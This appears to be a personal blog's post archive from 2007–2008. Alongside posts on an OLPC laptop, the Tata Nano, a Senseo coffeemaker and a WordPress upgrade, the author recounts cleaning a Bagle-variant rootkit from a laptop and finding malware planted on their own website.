Into the Void

My XO Laptop is almost here. Watch this space for a
technical writeup and demo video.

—– Original Message —–
From: OLPC Customer Care
To: banth@…..
Sent: Thursday, January 24, 2008 2:30 AM
Subject: Your XO Laptop

Dear Donor,
We wrote you several days ago to let you know that your donation is in our
shipping queue for the shipment of your XO laptop.
We are awaiting the arrival of new inventory so that we may ship your laptop
to you. We will send you another update in the next few days when we have
specific shipping information.
We appreciate your generosity and patience.
Sincerely,
OLPC Donor Services

“Think left and think right and think low and think high. Oh, the thinks you can think up if only you try!”
– Dr. Suess

Mr. Ratan N. Tata, Chairman of the Tata Group and Tata Motors, today unveiled the Tata ‘NANO’ - The People’s Car from Tata Motors that India and the world have been looking forward to. A development, which signifies a first for the global automobile industry, the People’s Car brings the comfort and safety of a car within the reach of thousands of families. The People’s Car will be launched in India later in 2008.

“I observed families riding on two-wheelers – the father driving the scooter, his young kid standing in front of him, his wife seated behind him holding a little baby. It led me to wonder whether one could conceive of a safe, affordable, all-weather form of transport for such a family. Tata Motors’ engineers and designers gave their all for about four years to realise this goal. Today, we indeed have a People’s Car, which is affordable and yet built to meet safety requirements and emission norms, to be fuel efficient and low on emissions. We are happy to present the People’s Car to India and we hope it brings the joy, pride and utility of owning a car to many families who need personal mobility.”
– Mr. Ratan N. Tata, Chairman of the Tata Group and Tata Motors, speaking at the unveiling ceremony at the 9th Auto Expo in New Delhi.

technical info to follow…

Thought for the day:

“Actually, it seems to me the life of a middle aged male is a race between hair falling out of its own accord and getting ripped out over stress and irritation. Women have it harder—they have to rip it all out.”
– John Walker, founder of Autodesk in The Hacker’s Diet, Electronic Edition, 1993.

Senseo® - Gourmet Coffee Everytime Anytime™

Right before the holidays I broke my Senseo single-cup coffeemaker. It’s been utter hell. I even resorted to grinding beans in the blender with banana, vanilla, and soy milk…

In the course of looking for good deals on a new Senseo, I found the above website. You take the quiz, you share the Senseo with a couple of your other friends’ email addresses, and a couple of days later they send you an offer by email to get a new Senseo for $15 shipping and handling. You can’t beat that!

It arrived today, two days later. I’m amazed.

The coffee pods for the Senseo come in packs of 16 or 18 for $4 or $5 a pack. If you’re used to a 10-cup coffeemaker, 30¢ a cup sounds pretty pricey. However, if you drink that overpriced swill from the Coffee Nazis at St*rbuck’s you’ll save over $1 over a Tall latte. Use 2 coffee pods for espresso or a Grande, and you still save. Heh, I like my caffeine thick.

Why do they call their small coffee “Tall?”

When I got tired of the limited selection of coffee pods for the Senseo, I bought an Ecopad Refillable Coffee Filter from amazon.com. It saves me money and enables me to use whatever coffee I want. I’m rather partial to Cafe Bustelo. Anyway, I’ve tried other coffee pods for the Senseo and they don’t work well - I think they don’t allow enough pressure to build up in the Senseo.

The best part of getting a Senseo is you don’t have to learn a whole new language just to get a cup of coffee. Has anyone else noticed that if you don’t say your coffee order right, St*rbuck’s is sold out of your first choice in scones?

It would, of course, would have been far easier to reformat my hard drive.

The problem seems to be a bagel variant and has something to do with files named
C:\WINDOWS\system32\drivers\hidr.exe
C:\WINDOWS\system32\drivers\srosa.sys
and possibly an infected NETWAITING.EXE file.

I have tried multiple rootkit detection and removal programs with varying degrees of success.

McAfee Security Center says that no parts of my McAfee software are enabled. It says that parts of the software are missing and I have to reinstall.

McAfee Rootkit Detective 1.1 flagged hidr.sys and said it would remove it, but it didn’t.

F-Secure Online Virus Scanner is unable to download all its files - I suspect the bug is blocking them. Their Blacklight program has been integrated into the new scanner. Oh well.

AVG Free won’t install - it can’t find one of its installation files - I assume the malware is deleting it. AVG is my number one favorite free antivirus program.

Panda Anti-rootkit, available from Download.com, found the files and renamed one of them, but the problem came back next boot. Panda offers a number of free tools too, including an online scanner called ActiveScan and a beta online scanner named nano-scan. The big thing they offer is repair utilities for specific infections.

EliBagle v10.75 located the files and a registry entry. I rebooted in safe mode. I deleted the files. I deleted the registry entry. And just to be certain, I deleted the preload file for hidr.exe.

At this point IE is no longer going out to strange web sites. I can only hope that it was unable to download something even worse while McAfee was down.

My McAfee subscription is still active, but I haven’t decided whether to reinstall or to switch to something cheaper and just as useless.

Technorati: bagel+variant rootkit Panda+Anti-rootkit Panda+ActiveScan Rootkit+Detective F-Secure trojan

I found a related topic on the What the Tech forums.
http://forums.whatthetech.com/Someonething…ml&hl=srosa

It may be the same as my problem. The tool mentioned in the article, Blacklight, is no longer available, but the company has a dozen or so FREE special-purpose disinfecting tools. Time to make the donuts… errrr…. bagels.[/i]

Update 12/3/2007:
Got it! With a a couple of utilities and a brief foray into the frightening forest of “safe mode.” Why do they call it safe mode when you can do so much damage from there?

Please, folks, I’m just messing around here. DON’T DO WHAT I DID TO FIX YOUR PROBLEM!!! I’m an old lady who does regular backups and I often screw things up bad enough that I have to reformat. One thing about having two hard drives is that your data is (usually) safe from your tender ministrations.

So.

This thing seems to have been a Bagel variant. The gist of it is that it runs as a driver. An “intercept directory listings and delete anti-virus files” sort of a driver. Regular spyware cleaners don’t even look at drivers. So [i]that’s[/i] what a rookit is! Now things are starting to make sense. HJT didn’t list this bug.

Bagel hid its files well. Once I ran something to detect rootkits I had something to work with - filenames and registry entries. I couldn’t find anything to clean it automatically, but as I said, I’m not afraid to reformat. In a DOS command shell “dir sr*” listed the file srosa.sys. No other way of listing the directory could see it. Not “dir,” not “dir s*.” I couldn’t list hidr.wtfever it was called, but when I tried to delete it the error message indicated that the file was indeed there but couldn’t be deleted. Safe mode it is. I deleted the files, modified the registry, and sacrificed a small animal to the ‘Net God in hopes that my laptop would reboot after what I did. Hey, stuff happens.

So after all that garbage, my laptop is no longer going out to sites in Eastern Bloc countries looking for… trouble. My hope is that I didn’t delete some driver that, say, enables me to play movies or burn mp3 CDs for the car. That remains to be seen.

However, there is an entry left in the registry called LEGACY_SROSA. Since it doesn’t expressly list the path of “srosa” I’m not sure whether to delete it.

Found this f*cker at the bottom of index.php. The file was in the top level and IE kindly downloaded it for me. It’s late, it’s my own site, and I wasn’t paying attention. I ran it. I don’t know what’s going to happen. I’m running a McAfee scan - it didn’t flag the executable - and I suppose I should grab AdAware or Spybot S&D or both.

Now if you’ll excuse me, I’m going to go boil my laptop.

Update 11/19:
IE went out to a bunch of sites this morning looking for a page called hltraff.php. Not good. It also killed McAfee and won’t let me do a system restore. I found the installation and as I looked at the file it disappeared from the directory. I guess I’m going to have to reformat and start over.

Update 11/25:
I am so pwned.

First access of this file - the first person who was infected by my site - gives me an idea when it was uploaded to my server.

That’s someone who my webpage may have infected. After that the accesses come several times a page.

This is the ftp access where the hacker uploaded the infection and the hacked index.php:

66.246.252.53 resolves to sr178.2dayhost.com - that’s the hacker.
69.141.48.56 resolves to c-69-141-48-56.hsd1.pa.comcast.net - that’s me.

RPS - 15

This is an extreme version of Rock-Paper-Scissors. There are fifteen hand gestures, each of which wins over seven gestures and loses to seven gestures. With that many gestures, there is only a one-in-fifteen chance of a tie.

Via the Daily Nugget.

Technorati: extreme+sports rock+paper+scissors

yeah

Just upgraded to WordPress 2.3.1. The release, not the release candidate. I wound up have to go into phpMyAdmin and set the auto_increment value in some of the MySQL tables.

Now that I’ve sorted it out, I have to say that so far I like it. Sidebar widgets and tags are built right in.